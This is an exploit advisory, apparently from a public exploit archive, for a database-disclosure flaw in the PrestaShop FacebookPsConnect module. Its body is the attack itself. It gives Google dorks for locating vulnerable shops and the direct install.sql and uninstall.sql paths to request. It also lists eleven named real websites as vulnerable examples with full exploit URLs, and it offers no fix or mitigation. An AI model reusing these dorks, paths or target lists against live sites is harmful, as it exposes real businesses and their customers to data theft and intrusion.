#################################################################################################
# Exploit Title : PrestaShop FacebookPsConnect Modules 1.6.1.4 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/01/2019
# Vendor Homepage : prestashop.com ~ businesstech.fr
# Software Download Link : modulebazaar.com/prestashop-facebook-connect.html
+ sourceforge.net/projects/prestashopfacebookconnect/
# Software Installation Price : 50$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.11.0± ~ 1.5.4.0 ~ 1.5.5.0 ~ 1.5.6.1 ~ 1.5.6.2 ~ 1.6.1.4 ~ 1.6.0.9
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/facebookpsconnect/sql/''
intext:''Fièrement réalisé par Mezcalito''
intext:''Copyright 2018 / PrestaShop. Implented by DGWStudios.com & Design by LeoTheme''
intext:''Copyrights 2012 rygeshop.dk Alle rettigheder forbeholdes''
intext:''© 2018 Powered by Billiandi Creations Ltd™''
intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet''
intext:''© 2013 oscadi.com™''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# PacketStormSecurity Exploit Reference Link :
packetstormsecurity.com/files/150903/PrestaShop-FacebookPsConnect-1.6.1.4-Database-Disclosure.html
#################################################################################################
* PrestaShop FacebookPsConnect Modules Install Uninstall Script Database Disclosure
#################################################################################################
# Exploit :
/modules/facebookpsconnect/sql/install.sql
/modules/facebookpsconnect/sql/uninstall.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] fcgshop.com/modules/facebookpsconnect/sql/install.sql
[+] vinta-quatre.com/modules/facebookpsconnect/sql/install.sql
[+] poemana.com/catalogue/modules/facebookpsconnect/sql/install.sql
[+] lecoindespetits.com/modules/facebookpsconnect/sql/install.sql
[+] dimayori.com.gt/modules/facebookpsconnect/sql/install.sql
[+] shakarababe.com/modules/facebookpsconnect/sql/
[+] neurodigital.es/store/modules/facebookpsconnect/sql/install.sql
[+] rygeshop.dk/modules/facebookpsconnect/sql/install.sql
[+] ultimateparisguide.com/registration/modules/facebookpsconnect/sql/install.sql
[+] dietanat.com/modules/facebookpsconnect/sql/install.sql
[+] margauxlonnberg.com/shop/modules/facebookpsconnect/sql/install.sql
#################################################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################